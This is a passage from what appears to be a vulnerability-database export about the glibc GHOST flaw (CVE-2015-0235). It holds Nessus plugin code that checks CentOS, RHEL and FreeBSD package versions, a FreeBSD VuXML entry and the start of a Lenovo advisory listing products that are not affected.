{"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81025", "published": "2015-01-28T00:00:00", "title": "CentOS 5 : glibc (CESA-2015:0090) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# CentOS Errata and Security Advisory 2015:0090 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81025);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93e1c138\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81034", "published": "2015-01-28T00:00:00", "title": "RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81034);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0092\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:24", "bulletinFamily": "scanner", "description": "Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application. The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.", "modified": "2018-11-21T00:00:00", "id": "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81062", "published": "2015-01-29T00:00:00", "title": "FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81062);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/21 10:46:31\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and\ngethostbyname2() function calls in the glibc library. This\nvulnerability allows a remote attacker that is able to make an\napplication call to either of these functions to execute arbitrary\ncode with the permissions of the user running the application. The\ngethostbyname() function calls are used for DNS resolving, which is a\nvery common event. To exploit this vulnerability, an attacker must\ntrigger a buffer overflow by supplying an invalid hostname argument to\nan application that performs a DNS resolution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1332213\"\n );\n # http://www.openwall.com/lists/oss-security/2015/01/27/9\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/01/27/9\"\n );\n # https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd7b81d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-f10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.6_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-f10>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-devtools<6.6_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-devtools>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "unix", "description": "\nRobert Kr\u00c3\u00a1tk\u00c3\u00bd reports:\n\n\n\t GHOST is a 'buffer overflow' bug affecting the gethostbyname() and\n\t gethostbyname2() function calls in the glibc library. This\n\t vulnerability allows a remote attacker that is able to make an\n\t application call to either of these functions to execute arbitrary\n\t code with the permissions of the user running the application.\n\t The gethostbyname() function calls are used for DNS resolving, which\n\t is a very common event. To exploit this vulnerability, an attacker\n\t must trigger a buffer overflow by supplying an invalid hostname\n\t argument to an application that performs a DNS resolution.\n\n", "modified": "2015-02-02T00:00:00", "published": "2015-01-27T00:00:00", "id": "0765DE84-A6C1-11E4-A0C1-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html", "title": "glibc -- gethostbyname buffer overflow", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2018-02-21T17:01:58", "bulletinFamily": "info", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e (AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not 